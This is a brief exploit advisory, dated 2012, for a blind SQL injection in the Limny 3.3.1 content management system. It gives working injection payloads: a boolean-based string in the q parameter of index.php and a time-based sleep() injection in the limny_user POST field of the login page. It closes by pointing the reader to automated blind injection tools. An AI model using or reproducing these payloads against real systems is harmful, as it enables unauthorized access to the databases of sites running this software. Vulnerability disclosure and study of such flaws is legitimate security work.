########################################### ### Exploit Title: Limny v 3.3.1 Blind SQL Injection ### Date: 31/7/2012 ### Author: L0n3ly-H34rT ### Homepage: http://se3c.tk/ ### Contact: l0n3ly_h34rt@hotmail.com ### Software Link: http://www.limny.org/releases/limny-3.3.1.zip ### Tested on: Linux/Windows ############################################ # Example 1: http://127.0.0.1/limny-3.3.1/index.php?q=-1' or 57 = '55 # Example 2: http://127.0.0.1/limny-3.3.1/index.php?q=-/login POST in limny_user some mysql time injection like : ' or (sleep(1)+1) limit 1 -- # Note : If you are lazy, use some automatic Blind SQL Injection :) # Greetz to my friendz